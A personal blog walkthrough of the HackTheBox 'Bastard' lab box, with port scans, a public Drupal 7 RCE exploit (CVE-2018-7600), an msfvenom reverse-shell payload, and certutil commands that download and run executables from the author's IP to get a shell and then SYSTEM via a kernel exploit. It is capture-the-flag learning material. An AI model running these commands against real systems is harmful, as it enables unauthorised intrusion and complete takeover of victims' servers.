hackthebox bastard walkthrough

Starting with nmap.

# nmap 10.10.10.9
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-24 10:09 EDT
Nmap scan report for 10.10.10.9
Host is up (0.31s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
49154/tcp open  unknown

Scan all ports with masscan

# masscan -e tun0 10.10.10.9 -p1-65535 --rate=1000

Starting masscan 1.0.6 (http://bit.ly/14GZzcT) at 2019-06-24 14:15:02 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 49154/tcp on 10.10.10.9                                   
Discovered open port 135/tcp on 10.10.10.9                                     
Discovered open port 80/tcp on 10.10.10.9 

Doing another scan in open ports using default script.

# nmap -sC -sV 10.10.10.9 -oA bastard
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-24 10:29 EDT
Nmap scan report for 10.10.10.9
Host is up (0.28s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.43 seconds

port 80 reveals Drupal website.

hackthebox – bastard – Drupal

Looking at CHANGELOG.txt we are using Drupal version 7.54. Simple Google searching, we found another exploit here.

# python drupa7-CVE-2018-7600.py 
()
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

usage: drupa7-CVE-2018-7600.py [-h] [-c COMMAND] [-f FUNCTION] [-p PROXY]
                               target
drupa7-CVE-2018-7600.py: error: too few arguments

Oopss!! let me try that again.

# python drupa7-CVE-2018-7600.py http://10.10.10.9/ -c whoami
()
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-ByG_2Z3QmGyS9xXQBNuXaHdBCuE34SwDHYuELJWYVIo
[*] Triggering exploit to execute: whoami
nt authority\iusr

Sweet! I am iusr. what can I do?? Let’s grab system information.

# python drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "systeminfo"
()
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-iTAK9zFmvizkN2CtoELMj7xx5rxLP6u07-GBY-5iPrE
[*] Triggering exploit to execute: systeminfo

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46 ��
System Boot Time:          24/6/2019, 3:22:51 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2593 Mhz
                           [02]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2593 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.048 MB
Available Physical Memory: 1.568 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.604 MB
Virtual Memory: In Use:    491 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9

We got OS information. Hmm, useful, save it as systeminfo.txt file. Anyway, let’s work to grab a shell. Create a exe file using msfvenom.

# msfvenom  lhost=10.10.14.21 lport=4444 -f exe --platform windows -p windows/shell_reverse_tcp > dev.exe
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

Setup python server…

# python -m SimpleHTTPServer 80

…and listen in port 4444 for shell.

# nc -lvnp 4444

Run the following command.

# python drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "certutil -urlcache -split -f http://10.10.14.21/dev.exe %temp%/dev.exe && %temp%/dev.exe"

In above command, 10.10.14.21 is my IP address.

Hopefully you will get shell too.

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.9] 63162
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\iusr

Use windows-exploit-suggestor against systeminfo.txt that we saved before.

# python windows-exploit-suggester.py --database 2019-06-24-mssb.xls --systeminfo ~/htb/bastard/systeminfo.txt 
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

For some reason, I was not able to execute exe if I get it from the shell, so I used a python script to download executable and ran it. For this box, I used MS19-059 as before. I get it from here. Remember, it is a good practice to compile your own binary. This may not be the intended way but I did this way. Feel free to mention alternative ways (other than ippsec walkthrough)

Listen for shell on port 443.

# nc -lvnp 443

Run the script.

# python drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "certutil -urlcache -split -f http://10.10.14.21/MS10-059.exe %temp%/MS10-059.exe && %temp%/MS10-059.exe 10.10.14.21 443"
()
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-IXXTzoX8LF3w8nEXc8ZyuEAGhRnXjUcwOT8R9RjdyLI
[*] Triggering exploit to execute: certutil -urlcache -split -f http://10.10.14.21/MS10-059.exe %temp%/MS10-059.exe && %temp%/MS10-059.exe 10.10.14.21 443
# nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.9] 63181
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system

Now, you can read the flags.

Leave a Reply

Your email address will not be published. Required fields are marked *